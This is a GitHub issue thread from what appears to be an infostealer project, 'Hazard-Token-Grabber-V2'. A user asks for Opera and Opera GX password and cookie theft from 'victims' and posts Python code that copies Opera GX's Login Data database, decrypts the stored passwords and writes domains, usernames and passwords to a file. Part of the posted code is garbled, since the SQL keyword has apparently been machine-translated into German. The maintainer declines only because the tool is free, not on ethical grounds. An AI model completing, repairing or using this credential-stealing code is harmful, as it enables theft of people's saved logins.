### ISSUE TITLE
[REQUEST] Opera and Opera GX Password, Cookie Data 

### ISSUE THREAD

**Issue by xNirex04** [Rdimo/Hazard-Token-Grabber-V2#230]
It would be cool instead of Chrome Data, Opera Data from Opera and Opera GX, because much of People Victims use not Chrome they use often Microsoft Edge or Opera

**Comment by Rdimo** [comment]
sry but as stated in the readme I wont make this one more op since its free

**Comment by xNirex04** [comment]
> sry but as stated in the readme I wont make this one more op since its free

So is there any way i mean what is the path of the login i wrote

self.appdata+'\\Opera Software\\Opera GX Stable')
login_db = self.appdata+'\\Opera Software\\Opera GX Stable\\Login Data'
login = self.temp+self.sep+"Loginvault1.db"

**Comment by Rdimo** [comment]
what

**Comment by xNirex04** [comment]
> what

`@try_extract
    def grabPasswordOpera(self):
        master_key = self.get_master_key(
        self.appdata+'\\Opera Software\\Opera GX Stable')
        login_db = self.appdata+'\\Opera Software\\Opera GX Stable\\Login Data'
        login = self.temp+self.sep+"Loginvault1.db"

        shutil.copy2(login_db, login)
        conn = sqlite3.connect(login)
        cursor = conn.cursor()
        with open(self.dir+"\\Opera Passwords.txt", "w", encoding="cp437", errors='ignore') as f:
            cursor.execute(
                "WÄHLEN Sie action_url, username_value, password_value FROM logins")
            for r in cursor.fetchall():
                url = r[0]
                username = r[1]
                encrypted_password = r[2]
                decrypted_password = self.decrypt_val(
                    encrypted_password, master_key)
                if url != "":
                    f.write(
                        f"Domain: {url}\nBenutzer: {username}\nPasswort: {decrypted_password}\n\n")
        cursor.close()
        conn.close()
        os.remove(login)`


that is current the code
